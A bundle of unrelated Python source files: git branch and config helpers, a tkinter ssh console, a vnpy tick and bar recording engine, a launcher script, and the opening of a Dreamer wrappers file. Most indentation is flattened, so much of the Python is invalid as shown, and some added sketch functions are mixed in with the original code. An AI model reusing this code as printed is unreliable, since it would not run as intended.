"""Return {branch: <|option| value>} for all branches."""
try:
reg = re.compile(r'^branch\.(.*)\.%s$' % option)
lines = get_config_regexp(reg.pattern)
return {reg.match(k).group(1): v for k, v in (l.split() for l in lines)}
except subprocess2.CalledProcessError:
return {}
def branches(*args):
NO_BRANCH = ('* (no branch', '* (detached', '* (HEAD detached')
key = 'depot-tools.branch-limit'
limit = get_config_int(key, 20)
raw_branches = run('branch', *args).splitlines()
num = len(raw_branches)
if num > limit:
die("""\
Your git repo has too many branches (%d/%d) for this tool to work well.
You may adjust this limit by running:
git config %s <new_limit>
You may also try cleaning up your old branches by running:
git cl archive
""", num, limit, key)
for line in raw_branches:
if line.startswith(NO_BRANCH):
continue
yield line.split()[-1]
def get_config(option, default=None):
try:
return run('config', '--get', option) or default
except subprocess2.CalledProcessError:
return default
def get_config_int(option, default=0):
assert isinstance(default, int)
try:
return int(get_config(option, default))
except ValueError:
return default
def get_config_list(option):
try:
return run('config', '--get-all', option).split()
except subprocess2.CalledProcessError:
return []
def get_config_regexp(pattern):
if IS_WIN: # pragma: no cover
# this madness is because we call git.bat which calls git.exe which calls
# bash.exe (or something to that effect). Each layer divides the number of
# ^'s by 2.
pattern = pattern.replace('^', '^' * 8)
return run('config', '--get-regexp', pattern).splitlines()
def current_branch():
try:
return run('rev-parse', '--abbrev-ref', 'HEAD')
except subprocess2.CalledProcessError:
return None
def del_branch_config(branch, option, scope='local'):
del_config('branch.%s.%s' % (branch, option), scope=scope)
def del_config(option, scope='local'):
try:
run('config', '--' + scope, '--unset', option)
except subprocess2.CalledProcessError:
pass
def diff(oldrev, newrev, *args):
return run('diff', oldrev, newrev, *args)
def freeze():
took_action = False
key = 'depot-tools.freeze-size-limit'
MB = 2**20
limit_mb = get_config_int(key, 100)
untracked_bytes = 0
for f, s in status():
if is_unmerged(s):
die("Cannot freeze unmerged changes!")
if limit_mb > 0:
if s.lstat == '?':
untracked_bytes += os.stat(f).st_size
if untracked_bytes > limit_mb * MB:
die("""\
You appear to have too much untracked+unignored data in your git
checkout: %.1f / %d MB.
Run `git status` to see what it is.
In addition to making many git commands slower, this will prevent
depot_tools from freezing your in-progress changes.
You should add untracked data that you want to ignore to your repo's
.git/info/excludes
file. See `git help ignore` for the format of this file.
If this data is intended as part of your commit, you may adjust the
freeze limit by running:
git config %s <new_limit>
Where <new_limit> is an integer threshold in megabytes.""",
untracked_bytes / (MB * 1.0), limit_mb, key)
try:
run('commit', '--no-verify', '-m', FREEZE + '.indexed')
took_action = True
except subprocess2.CalledProcessError:
pass
add_errors = False
try:
run('add', '-A', '--ignore-errors')
except subprocess2.CalledProcessError:
add_errors = True
try:
run('commit', '--no-verify', '-m', FREEZE + '.unindexed')
took_action = True
except subprocess2.CalledProcessError:
pass
ret = []
if add_errors:
ret.append('Failed to index some unindexed files.')
if not took_action:
ret.append('Nothing to freeze.')
return ' '.join(ret) or None
def get_branch_tree():
"""Get the dictionary of {branch: parent}, compatible with topo_iter.
Returns a tuple of (skipped, <branch_tree dict>) where skipped is a set of
branches without upstream branches defined.
"""
skipped = set()
branch_tree = {}
for branch in branches():
parent = upstream(branch)
if not parent:
skipped.add(branch)
continue
branch_tree[branch] = parent
return skipped, branch_tree
def get_or_create_merge_base(branch, parent=None):
"""Finds the configured merge base for branch.
If parent is supplied, it's used instead of calling upstream(branch).
"""
base = branch_config(branch, 'base')
base_upstream = branch_config(branch, 'base-upstream')
parent = parent or upstream(branch)
if parent is None or branch is None:
return None
actual_merge_base = run('merge-base', parent, branch)
if base_upstream != parent:
base = None
base_upstream = None
def is_ancestor(a, b):
return run_with_retcode('merge-base', '--is-ancestor', a, b) == 0
if base and base != actual_merge_base:
if not is_ancestor(base, branch):
logging.debug('Found WRONG pre-set merge-base for %s: %s', branch, base)
base = None
elif is_ancestor(base, actual_merge_base):
logging.debug('Found OLD pre-set merge-base for %s: %s', branch, base)
base = None
else:
logging.debug('Found pre-set merge-base for %s: %s', branch, base)
if not base:
base = actual_merge_base
manual_merge_base(branch, base, parent)
return base
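# Illustrative sketch, not part of the original file: the merge base computed
# above is cached in branch config, so a hypothetical helper can drop the
# cached value to force it to be recomputed on the next call.
def _example_reset_merge_base(branch):
  """Drops the cached merge base and recomputes it for |branch|."""
  remove_merge_base(branch)
  return get_or_create_merge_base(branch)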
def hash_multi(*reflike):
return run('rev-parse', *reflike).splitlines()
def hash_one(reflike, short=False):
args = ['rev-parse', reflike]
if short:
args.insert(1, '--short')
return run(*args)
def in_rebase():
git_dir = run('rev-parse', '--git-dir')
return (
os.path.exists(os.path.join(git_dir, 'rebase-merge')) or
os.path.exists(os.path.join(git_dir, 'rebase-apply')))
def intern_f(f, kind='blob'):
"""Interns a file object into the git object store.
Args:
f (file-like object) - The file-like object to intern
kind (git object type) - One of 'blob', 'commit', 'tree', 'tag'.
Returns the git hash of the interned object (hex encoded).
"""
ret = run('hash-object', '-t', kind, '-w', '--stdin', stdin=f)
f.close()
return ret
def is_dormant(branch):
# TODO(iannucci): Do an oldness check?
return branch_config(branch, 'dormant', 'false') != 'false'
def is_unmerged(stat_value):
return (
'U' in (stat_value.lstat, stat_value.rstat) or
((stat_value.lstat == stat_value.rstat) and stat_value.lstat in 'AD')
)
def manual_merge_base(branch, base, parent):
set_branch_config(branch, 'base', base)
set_branch_config(branch, 'base-upstream', parent)
def mktree(treedict):
"""Makes a git tree object and returns its hash.
See |tree()| for the values of mode, type, and ref.
Args:
treedict - { name: (mode, type, ref) }
"""
with tempfile.TemporaryFile() as f:
for name, (mode, typ, ref) in treedict.iteritems():
f.write('%s %s %s\t%s\0' % (mode, typ, ref, name))
f.seek(0)
return run('mktree', '-z', stdin=f)
def parse_commitrefs(*commitrefs):
"""Returns binary encoded commit hashes for one or more commitrefs.
A commitref is anything which can resolve to a commit. Popular examples:
* 'HEAD'
* 'origin/master'
* 'cool_branch~2'
"""
try:
return map(binascii.unhexlify, hash_multi(*commitrefs))
except subprocess2.CalledProcessError:
raise BadCommitRefException(commitrefs)
RebaseRet = collections.namedtuple('RebaseRet', 'success stdout stderr')
def rebase(parent, start, branch, abort=False):
"""Rebases |start|..|branch| onto the branch |parent|.
Args:
parent - The new parent ref for the rebased commits.
start - The commit to start from
branch - The branch to rebase
abort - If True, will call git-rebase --abort in the event that the rebase
doesn't complete successfully.
  Returns a namedtuple with fields:
    success - a boolean indicating that the rebase command completed
              successfully.
    stdout - if the rebase failed, this contains the stdout of the failed
             rebase; it is an empty string on success.
    stderr - if the rebase failed, this contains the stderr of the failed
             rebase; it is an empty string on success.
"""
try:
args = ['--onto', parent, start, branch]
if TEST_MODE:
args.insert(0, '--committer-date-is-author-date')
run('rebase', *args)
return RebaseRet(True, '', '')
except subprocess2.CalledProcessError as cpe:
if abort:
run_with_retcode('rebase', '--abort') # ignore failure
return RebaseRet(False, cpe.stdout, cpe.stderr)
def remove_merge_base(branch):
del_branch_config(branch, 'base')
del_branch_config(branch, 'base-upstream')
def repo_root():
"""Returns the absolute path to the repository root."""
return run('rev-parse', '--show-toplevel')
def root():
return get_config('depot-tools.upstream', 'origin/master')
@contextlib.contextmanager
def less(): # pragma: no cover
"""Runs 'less' as context manager yielding its stdin as a PIPE.
Automatically checks if sys.stdout is a non-TTY stream. If so, it avoids
running less and just yields sys.stdout.
"""
if not setup_color.IS_TTY:
yield sys.stdout
return
# Run with the same options that git uses (see setup_pager in git repo).
# -F: Automatically quit if the output is less than one screen.
# -R: Don't escape ANSI color codes.
# -X: Don't clear the screen before starting.
cmd = ('less', '-FRX')
try:
proc = subprocess2.Popen(cmd, stdin=subprocess2.PIPE)
yield proc.stdin
finally:
proc.stdin.close()
proc.wait()
def run(*cmd, **kwargs):
"""The same as run_with_stderr, except it only returns stdout."""
return run_with_stderr(*cmd, **kwargs)[0]
def run_with_retcode(*cmd, **kwargs):
"""Run a command but only return the status code."""
try:
run(*cmd, **kwargs)
return 0
except subprocess2.CalledProcessError as cpe:
return cpe.returncode
def run_stream(*cmd, **kwargs):
"""Runs a git command. Returns stdout as a PIPE (file-like object).
stderr is dropped to avoid races if the process outputs to both stdout and
stderr.
"""
kwargs.setdefault('stderr', subprocess2.VOID)
kwargs.setdefault('stdout', subprocess2.PIPE)
kwargs.setdefault('shell', False)
cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd
proc = subprocess2.Popen(cmd, **kwargs)
return proc.stdout
@contextlib.contextmanager
def run_stream_with_retcode(*cmd, **kwargs):
"""Runs a git command as context manager yielding stdout as a PIPE.
stderr is dropped to avoid races if the process outputs to both stdout and
stderr.
Raises subprocess2.CalledProcessError on nonzero return code.
"""
kwargs.setdefault('stderr', subprocess2.VOID)
kwargs.setdefault('stdout', subprocess2.PIPE)
kwargs.setdefault('shell', False)
cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd
try:
proc = subprocess2.Popen(cmd, **kwargs)
yield proc.stdout
finally:
retcode = proc.wait()
if retcode != 0:
raise subprocess2.CalledProcessError(retcode, cmd, os.getcwd(),
None, None)
def run_with_stderr(*cmd, **kwargs):
"""Runs a git command.
Returns (stdout, stderr) as a pair of strings.
kwargs
autostrip (bool) - Strip the output. Defaults to True.
indata (str) - Specifies stdin data for the process.
"""
kwargs.setdefault('stdin', subprocess2.PIPE)
kwargs.setdefault('stdout', subprocess2.PIPE)
kwargs.setdefault('stderr', subprocess2.PIPE)
kwargs.setdefault('shell', False)
autostrip = kwargs.pop('autostrip', True)
indata = kwargs.pop('indata', None)
cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd
proc = subprocess2.Popen(cmd, **kwargs)
ret, err = proc.communicate(indata)
retcode = proc.wait()
if retcode != 0:
raise subprocess2.CalledProcessError(retcode, cmd, os.getcwd(), ret, err)
if autostrip:
ret = (ret or '').strip()
err = (err or '').strip()
return ret, err
def set_branch_config(branch, option, value, scope='local'):
set_config('branch.%s.%s' % (branch, option), value, scope=scope)
def set_config(option, value, scope='local'):
run('config', '--' + scope, option, value)
def get_dirty_files():
# Make sure index is up-to-date before running diff-index.
run_with_retcode('update-index', '--refresh', '-q')
return run('diff-index', '--name-status', 'HEAD')
def is_dirty_git_tree(cmd):
dirty = get_dirty_files()
if dirty:
print 'Cannot %s with a dirty tree. You must commit locally first.' % cmd
print 'Uncommitted files: (git diff-index --name-status HEAD)'
print dirty[:4096]
if len(dirty) > 4096: # pragma: no cover
print '... (run "git diff-index --name-status HEAD" to see full output).'
return True
return False
def status():
"""Returns a parsed version of git-status.
Returns a generator of (current_name, (lstat, rstat, src)) pairs where:
* current_name is the name of the file
* lstat is the left status code letter from git-status
    * rstat is the right status code letter from git-status
* src is the current name of the file, or the original name of the file
if lstat == 'R'
"""
stat_entry = collections.namedtuple('stat_entry', 'lstat rstat src')
def tokenizer(stream):
acc = StringIO()
c = None
while c != '':
c = stream.read(1)
if c in (None, '', '\0'):
if acc.len:
yield acc.getvalue()
acc = StringIO()
else:
acc.write(c)
def parser(tokens):
while True:
# Raises StopIteration if it runs out of tokens.
status_dest = next(tokens)
stat, dest = status_dest[:2], status_dest[3:]
lstat, rstat = stat
if lstat == 'R':
src = next(tokens)
else:
src = dest
yield (dest, stat_entry(lstat, rstat, src))
return parser(tokenizer(run_stream('status', '-z', bufsize=-1)))
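# Illustrative sketch, not part of the original file: status() yields
# (name, stat_entry) pairs, so callers iterate over it the way freeze() does
# above. This hypothetical helper collects the paths of unmerged files.
def _example_unmerged_files():
  """Returns the list of file names whose status is unmerged."""
  return [f for f, s in status() if is_unmerged(s)]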
def squash_current_branch(header=None, merge_base=None):
header = header or 'git squash commit.'
merge_base = merge_base or get_or_create_merge_base(current_branch())
log_msg = header + '\n'
if log_msg:
log_msg += '\n'
log_msg += run('log', '--reverse', '--format=%H%n%B', '%s..HEAD' % merge_base)
run('reset', '--soft', merge_base)
if not get_dirty_files():
# Sometimes the squash can result in the same tree, meaning that there is
# nothing to commit at this point.
print 'Nothing to commit; squashed branch is empty'
return False
run('commit', '--no-verify', '-a', '-F', '-', indata=log_msg)
return True
def tags(*args):
return run('tag', *args).splitlines()
def thaw():
took_action = False
for sha in (s.strip() for s in run_stream('rev-list', 'HEAD').xreadlines()):
msg = run('show', '--format=%f%b', '-s', 'HEAD')
match = FREEZE_MATCHER.match(msg)
if not match:
if not took_action:
return 'Nothing to thaw.'
break
run('reset', '--' + FREEZE_SECTIONS[match.group(1)], sha)
took_action = True
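# Illustrative sketch, not part of the original file: freeze() and thaw() are
# inverses, so a hypothetical helper can run an operation on a clean tree and
# then restore the user's in-progress work. Thawing is safe even when freeze()
# found nothing to commit.
def _example_with_frozen_tree(fn):
  """Runs |fn| with any in-progress changes frozen, then thaws them again."""
  freeze()
  try:
    return fn()
  finally:
    thaw()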
def topo_iter(branch_tree, top_down=True):
"""Generates (branch, parent) in topographical order for a branch tree.
Given a tree:
A1
B1 B2
C1 C2 C3
D1
branch_tree would look like: {
'D1': 'C3',
'C3': 'B2',
'B2': 'A1',
'C1': 'B1',
'C2': 'B1',
'B1': 'A1',
}
It is OK to have multiple 'root' nodes in your graph.
  If top_down is True, items are yielded from A->D. Otherwise they're yielded
from D->A. Within a layer the branches will be yielded in sorted order.
"""
branch_tree = branch_tree.copy()
# TODO(iannucci): There is probably a more efficient way to do these.
if top_down:
while branch_tree:
this_pass = [(b, p) for b, p in branch_tree.iteritems()
if p not in branch_tree]
assert this_pass, "Branch tree has cycles: %r" % branch_tree
for branch, parent in sorted(this_pass):
yield branch, parent
del branch_tree[branch]
else:
parent_to_branches = collections.defaultdict(set)
for branch, parent in branch_tree.iteritems():
parent_to_branches[parent].add(branch)
while branch_tree:
this_pass = [(b, p) for b, p in branch_tree.iteritems()
if not parent_to_branches[b]]
assert this_pass, "Branch tree has cycles: %r" % branch_tree
for branch, parent in sorted(this_pass):
yield branch, parent
parent_to_branches[parent].discard(branch)
del branch_tree[branch]
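# Illustrative sketch, not part of the original file: get_branch_tree() and
# topo_iter() are designed to be combined. For the example tree in the
# docstring above, top-down iteration yields B1, B2, C1, C2, C3, D1 and
# bottom-up iteration yields C1, C2, D1, B1, C3, B2.
def _example_walk_branches():
  """Returns (skipped, branches in children-before-parents order)."""
  skipped, branch_tree = get_branch_tree()
  ordered = [b for b, _ in topo_iter(branch_tree, top_down=False)]
  return skipped, ordered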
def tree(treeref, recurse=False):
"""Returns a dict representation of a git tree object.
Args:
treeref (str) - a git ref which resolves to a tree (commits count as trees).
    recurse (bool) - include all of the tree's descendants too. File names will
take the form of 'some/path/to/file'.
Return format:
{ 'file_name': (mode, type, ref) }
mode is an integer where:
* 0040000 - Directory
* 0100644 - Regular non-executable file
* 0100664 - Regular non-executable group-writeable file
* 0100755 - Regular executable file
* 0120000 - Symbolic link
* 0160000 - Gitlink
type is a string where it's one of 'blob', 'commit', 'tree', 'tag'.
ref is the hex encoded hash of the entry.
"""
ret = {}
opts = ['ls-tree', '--full-tree']
if recurse:
opts.append('-r')
opts.append(treeref)
try:
for line in run(*opts).splitlines():
mode, typ, ref, name = line.split(None, 3)
ret[name] = (mode, typ, ref)
except subprocess2.CalledProcessError:
return None
return ret
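# Illustrative sketch, not part of the original file: tree() returns entries in
# exactly the {name: (mode, type, ref)} shape that mktree() consumes, so the
# two can be chained, as in this hypothetical helper that copies a tree object.
def _example_copy_tree(treeref):
  """Re-interns the (non-recursive) tree at |treeref| and returns its hash."""
  entries = tree(treeref)
  if entries is None:
    return None
  return mktree(entries)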
def upstream(branch):
try:
return run('rev-parse', '--abbrev-ref', '--symbolic-full-name',
branch+'@{upstream}')
except subprocess2.CalledProcessError:
return None
def get_git_version():
"""Returns a tuple that contains the numeric components of the current git
version."""
version_string = run('--version')
  version_match = re.search(r'(\d+\.)+(\d+)', version_string)
version = version_match.group() if version_match else ''
return tuple(int(x) for x in version.split('.'))
def get_branches_info(include_tracking_status):
format_string = (
'--format=%(refname:short):%(objectname:short):%(upstream:short):')
# This is not covered by the depot_tools CQ which only has git version 1.8.
if (include_tracking_status and
get_git_version() >= MIN_UPSTREAM_TRACK_GIT_VERSION): # pragma: no cover
format_string += '%(upstream:track)'
info_map = {}
data = run('for-each-ref', format_string, 'refs/heads')
BranchesInfo = collections.namedtuple(
'BranchesInfo', 'hash upstream ahead behind')
for line in data.splitlines():
(branch, branch_hash, upstream_branch, tracking_status) = line.split(':')
ahead_match = re.search(r'ahead (\d+)', tracking_status)
ahead = int(ahead_match.group(1)) if ahead_match else None
behind_match = re.search(r'behind (\d+)', tracking_status)
behind = int(behind_match.group(1)) if behind_match else None
info_map[branch] = BranchesInfo(
hash=branch_hash, upstream=upstream_branch, ahead=ahead, behind=behind)
  # Set None for upstreams which are not branches (e.g. empty upstream, remotes
# and deleted upstream branches).
missing_upstreams = {}
for info in info_map.values():
if info.upstream not in info_map and info.upstream not in missing_upstreams:
missing_upstreams[info.upstream] = None
return dict(info_map.items() + missing_upstreams.items())
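# Illustrative sketch, not part of the original file: a hypothetical consumer
# of the BranchesInfo map above, listing branches that are ahead of their
# upstreams (entries for missing upstreams are None and are skipped).
def _example_branches_ahead():
  info_map = get_branches_info(include_tracking_status=True)
  return sorted(b for b, info in info_map.items() if info and info.ahead)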
def make_workdir_common(repository, new_workdir, files_to_symlink,
files_to_copy, symlink=None):
if not symlink:
symlink = os.symlink
os.makedirs(new_workdir)
for entry in files_to_symlink:
clone_file(repository, new_workdir, entry, symlink)
for entry in files_to_copy:
clone_file(repository, new_workdir, entry, shutil.copy)
def make_workdir(repository, new_workdir):
GIT_DIRECTORY_WHITELIST = [
'config',
'info',
'hooks',
'logs/refs',
'objects',
'packed-refs',
'refs',
'remotes',
'rr-cache',
'svn'
]
make_workdir_common(repository, new_workdir, GIT_DIRECTORY_WHITELIST,
['HEAD'])
def clone_file(repository, new_workdir, link, operation):
if not os.path.exists(os.path.join(repository, link)):
return
link_dir = os.path.dirname(os.path.join(new_workdir, link))
if not os.path.exists(link_dir):
os.makedirs(link_dir)
operation(os.path.join(repository, link), os.path.join(new_workdir, link))
|
console.py
|
import subprocess
import queue
import threading
import tkinter as tk
from tkinter.font import Font
from tkinter.scrolledtext import ScrolledText
from tkinter import N, S, E, W
from config import CommandsConfig
config = CommandsConfig()
class Console:
def __init__(self, frame):
self.frame = frame
self.process = None
self.cmd = tk.StringVar()
self.queue = queue.Queue()
self.thread = None
self.font = Font(family='Courier New', name='outputFont', size=16, weight='normal')
self.bg = '#121212'
self.fg = '#32CD32'
self.init_input()
self.init_output()
self.login()
self.frame.after(100, self.get_output)
def init_input(self):
# input container grid
self.input_container = tk.Frame(self.frame)
self.input_container.grid(row=1, column=0, sticky=N+W, padx=20, pady=0)
self.input_container.config(bg=self.bg)
tk.Grid.rowconfigure(self.input_container, 0, weight=1)
tk.Grid.rowconfigure(self.input_container, 1, weight=1)
tk.Grid.columnconfigure(self.input_container, 0, weight=1)
# input label text
label = tk.Label(self.input_container, text='Input:', bg=self.bg, fg=self.fg, font=self.font)
label.grid(row=0, column=0, sticky=N+W)
# input entry
self.entry = tk.Entry(self.input_container, bg=self.bg, fg=self.fg, font=self.font)
self.entry.grid(row=1, column=0)
self.entry["textvariable"] = self.cmd
self.entry.bind('<Key-Return>', self.enter_command)
def init_output(self):
# output label frame
        self.window = tk.LabelFrame(self.frame, text='Output:', height=1300, bg=self.bg, fg=self.fg, font=self.font)
self.window.grid(row=2, column=0, sticky=N+S+E+W, padx=20, pady=20)
tk.Grid.columnconfigure(self.window, 0, weight=1)
tk.Grid.rowconfigure(self.window, 0, weight=1)
tk.Grid.rowconfigure(self.window, 1, weight=2)
# scrolled text output
self.scrolled_text = ScrolledText(self.window, state='disabled', height=36)
self.scrolled_text.grid(row=0, column=0, sticky=N+S+E+W, padx=15, pady=15)
self.scrolled_text.configure(background='#121212', foreground='#32CD32', font=self.font, wrap='word')
def login(self):
# ssh into server via pre-configured executable script
self.process = subprocess.Popen(['droplet'],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
start_new_session=True)
t = threading.Thread(target=self.output_reader, args=(self.process,))
t._stop_event = threading.Event()
self.thread = t
self.thread.start()
def output_reader(self, proc):
for line in iter(proc.stdout.readline, b''):
self.queue.put(line.decode('utf-8'))
def get_output(self):
while True:
try:
record = self.queue.get(block=False)
except queue.Empty:
break
else:
self.show_message(message=record)
self.frame.after(100, self.get_output)
def show_message(self, message):
self.scrolled_text.configure(state='normal')
self.scrolled_text.insert(tk.END, message)
self.scrolled_text.configure(state='disabled')
#self.scrolled_text.yview(tk.END)
def flush_output(self):
self.process.stdout.flush()
self.scrolled_text.configure(state='normal')
self.scrolled_text.delete(1.0, tk.END)
self.scrolled_text.configure(state='disabled')
return
def enter_command(self, event):
try:
cmd = self.cmd.get()
bytestr = bytes(f'{cmd}\n', encoding='utf-8')
self.flush_output()
self.process.stdin.write(bytestr)
self.process.stdin.flush()
self.frame.after(100, self.get_output)
self.cmd.set('')
except Exception as e:
print(f'Caught exception: {e}')
def check_status(self):
self.flush_output()
self.process.stdin.write(config.xgen_status)
self.process.stdin.flush()
self.frame.after(100, self.get_output)
def get_logs(self):
self.flush_output()
self.process.stdin.write(config.xgen_gunicorn)
self.process.stdin.write(config.pwd)
self.process.stdin.flush()
self.frame.after(100, self.get_output)
def access_logs(self):
self.flush_output()
self.process.stdin.write(config.nginx_access)
self.process.stdin.write(config.pwd)
self.process.stdin.flush()
self.frame.after(100, self.get_output)
def logout(self):
self.process.stdin.write(b'exit\n')
self.process.stdin.flush()
self.process.terminate()
self.thread._stop_event.set()
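# Illustrative sketch, not part of the original file: the Console populates a
# parent frame via grid(), so a minimal host window could look like this. It
# assumes the 'droplet' login script and the CommandsConfig module imported
# above exist on this machine; example_main is a hypothetical entry point.
def example_main():
    root = tk.Tk()
    root.title('Remote console')
    frame = tk.Frame(root, bg='#121212')
    frame.grid(row=0, column=0, sticky=N+S+E+W)
    console = Console(frame)
    # Close the ssh session before destroying the window.
    root.protocol('WM_DELETE_WINDOW', lambda: (console.logout(), root.destroy()))
    root.mainloop()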
|
drEngine.py
|
# encoding: UTF-8
'''
This module implements the market data recording engine: it aggregates TICK
data, generates bars (K-lines) and inserts them into the database.
DR_setting.json configures the contracts to record as well as the active
(dominant) contract symbols.
'''
import json
import csv
import os
import copy
import traceback
from collections import OrderedDict
from datetime import datetime, timedelta
from Queue import Queue, Empty
from threading import Thread
from pymongo.errors import DuplicateKeyError
from vnpy.event import Event
from vnpy.trader.vtEvent import *
from vnpy.trader.vtFunction import todayDate, getJsonPath
from vnpy.trader.vtObject import VtSubscribeReq, VtLogData, VtBarData, VtTickData
from vnpy.trader.app.ctaStrategy.ctaTemplate import BarGenerator
from .drBase import *
from .language import text
########################################################################
class DrEngine(object):
"""数据记录引擎"""
settingFileName = 'DR_setting.json'
settingFilePath = getJsonPath(settingFileName, __file__)
#----------------------------------------------------------------------
def __init__(self, mainEngine, eventEngine):
"""Constructor"""
self.mainEngine = mainEngine
self.eventEngine = eventEngine
        # Current date
self.today = todayDate()
        # Active-contract mapping: key is the specific contract symbol (e.g. IF1604), value is the active contract symbol (e.g. IF0000)
self.activeSymbolDict = {}
        # Set of symbols whose ticks are recorded
self.tickSymbolSet = set()
        # Bar generator dictionary
self.bgDict = {}
        # Settings dictionary
self.settingDict = OrderedDict()
        # State for the dedicated thread that performs database inserts
        self.active = False                     # working flag
        self.queue = Queue()                    # task queue
        self.thread = Thread(target=self.run)   # worker thread
        # Load settings and subscribe to market data
self.loadSetting()
        # Start the database-insert thread
self.start()
        # Register event listeners
self.registerEvent()
#----------------------------------------------------------------------
def loadSetting(self):
"""加载配置"""
with open(self.settingFilePath) as f:
drSetting = json.load(f)
        # If 'working' is False, market data recording is disabled
working = drSetting['working']
if not working:
return
        # Tick recording settings
if 'tick' in drSetting:
l = drSetting['tick']
for setting in l:
symbol = setting[0]
gateway = setting[1]
vtSymbol = symbol
req = VtSubscribeReq()
req.symbol = setting[0]
                # For the LTS and IB gateways, subscribing requires the exchange code
if len(setting)>=3:
req.exchange = setting[2]
vtSymbol = '.'.join([symbol, req.exchange])
                # For the IB gateway, subscribing also requires the currency and product class
if len(setting)>=5:
req.currency = setting[3]
req.productClass = setting[4]
self.mainEngine.subscribe(req, gateway)
                #tick = VtTickData()  # this tick instance could cache partial data (currently unused)
#self.tickDict[vtSymbol] = tick
self.tickSymbolSet.add(vtSymbol)
                # Save to the settings dictionary
if vtSymbol not in self.settingDict:
d = {
'symbol': symbol,
'gateway': gateway,
'tick': True
}
self.settingDict[vtSymbol] = d
else:
d = self.settingDict[vtSymbol]
d['tick'] = True
        # Minute-bar recording settings
if 'bar' in drSetting:
l = drSetting['bar']
for setting in l:
symbol = setting[0]
gateway = setting[1]
vtSymbol = symbol
req = VtSubscribeReq()
req.symbol = symbol
if len(setting)>=3:
req.exchange = setting[2]
vtSymbol = '.'.join([symbol, req.exchange])
if len(setting)>=5:
req.currency = setting[3]
req.productClass = setting[4]
self.mainEngine.subscribe(req, gateway)
                # Save to the settings dictionary
if vtSymbol not in self.settingDict:
d = {
'symbol': symbol,
'gateway': gateway,
'bar': True
}
self.settingDict[vtSymbol] = d
else:
d = self.settingDict[vtSymbol]
d['bar'] = True
                # Create the BarGenerator object
self.bgDict[vtSymbol] = BarGenerator(self.onBar)
        # Active-contract recording settings
if 'active' in drSetting:
d = drSetting['active']
self.activeSymbolDict = {vtSymbol:activeSymbol for activeSymbol, vtSymbol in d.items()}
#----------------------------------------------------------------------
def getSetting(self):
"""获取配置"""
return self.settingDict, self.activeSymbolDict
#----------------------------------------------------------------------
def procecssTickEvent(self, event):
"""处理行情事件"""
tick = event.dict_['data']
vtSymbol = tick.vtSymbol
        # Build the datetime object
if not tick.datetime:
tick.datetime = datetime.strptime(' '.join([tick.date, tick.time]), '%Y%m%d %H:%M:%S.%f')
self.onTick(tick)
bm = self.bgDict.get(vtSymbol, None)
if bm:
bm.updateTick(tick)
#----------------------------------------------------------------------
def onTick(self, tick):
"""Tick更新"""
vtSymbol = tick.vtSymbol
if vtSymbol in self.tickSymbolSet:
self.insertData(TICK_DB_NAME, vtSymbol, tick)
if vtSymbol in self.activeSymbolDict:
activeSymbol = self.activeSymbolDict[vtSymbol]
self.insertData(TICK_DB_NAME, activeSymbol, tick)
self.writeDrLog(text.TICK_LOGGING_MESSAGE.format(symbol=tick.vtSymbol,
time=tick.time,
last=tick.lastPrice,
bid=tick.bidPrice1,
ask=tick.askPrice1))
#----------------------------------------------------------------------
def onBar(self, bar):
"""分钟线更新"""
vtSymbol = bar.vtSymbol
self.insertData(MINUTE_DB_NAME, vtSymbol, bar)
if vtSymbol in self.activeSymbolDict:
activeSymbol = self.activeSymbolDict[vtSymbol]
self.insertData(MINUTE_DB_NAME, activeSymbol, bar)
self.writeDrLog(text.BAR_LOGGING_MESSAGE.format(symbol=bar.vtSymbol,
time=bar.time,
open=bar.open,
high=bar.high,
low=bar.low,
close=bar.close))
#----------------------------------------------------------------------
def registerEvent(self):
"""注册事件监听"""
self.eventEngine.register(EVENT_TICK, self.procecssTickEvent)
#----------------------------------------------------------------------
def insertData(self, dbName, collectionName, data):
"""插入数据到数据库(这里的data可以是VtTickData或者VtBarData)"""
self.queue.put((dbName, collectionName, data.__dict__))
#----------------------------------------------------------------------
def run(self):
"""运行插入线程"""
while self.active:
try:
dbName, collectionName, d = self.queue.get(block=True, timeout=1)
                # Using MongoDB's update mode here is not recommended: when
                # recording ticks the queries become so frequent that CPU and
                # disk usage spike and the system stalls.
                #flt = {'datetime': d['datetime']}
                #self.mainEngine.dbUpdate(dbName, collectionName, d, flt, True)
                # Insert mode is used instead; duplicate timestamps may occur
                # and need to be cleaned up by the user.
try:
self.mainEngine.dbInsert(dbName, collectionName, d)
except DuplicateKeyError:
                    self.writeDrLog(u'Duplicate key, insert failed. Error info: %s' % traceback.format_exc())
except Empty:
pass
#----------------------------------------------------------------------
def start(self):
"""启动"""
self.active = True
self.thread.start()
#----------------------------------------------------------------------
def stop(self):
"""退出"""
if self.active:
self.active = False
self.thread.join()
#----------------------------------------------------------------------
def writeDrLog(self, content):
"""快速发出日志事件"""
log = VtLogData()
log.logContent = content
event = Event(type_=EVENT_DATARECORDER_LOG)
event.dict_['data'] = log
self.eventEngine.put(event)
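# Illustrative sketch, not part of the original file: the structure that
# loadSetting() expects from DR_setting.json, written out as a Python dict.
# Symbols, gateway names and the IB fields are hypothetical placeholders.
EXAMPLE_DR_SETTING = {
    'working': True,
    # Each entry: [symbol, gateway], optionally followed by [exchange] and,
    # for the IB gateway, [currency, productClass].
    'tick': [
        ['IF1604', 'CTP'],
        ['EUR.USD', 'IB', 'IDEALPRO', 'USD', 'CASH'],
    ],
    'bar': [
        ['IF1604', 'CTP'],
    ],
    # Maps the active (dominant) contract symbol to the specific contract.
    'active': {'IF0000': 'IF1604'},
}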
|
startProgram.py
|
"""
Starting point for running the program.
"""
from multiprocessing import Process
from MainWindow import start_main_win
from Utilities.IO.IOHelper import create_config_file,create_configt_file
if __name__ == '__main__':
create_config_file()
create_configt_file()
p = Process(target=start_main_win)
p.start()
p.join()
# start_main_win()
|
wrappers.py
|
# Copyright 2019 The Dreamer Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import datetime
import io
import os
import sys
import threading
import traceback
import uuid
import gym
import gym.spaces
import numpy as np
import skimage.transform
import tensorflow as tf
from dreamer import tools
class ObservationDict(object):
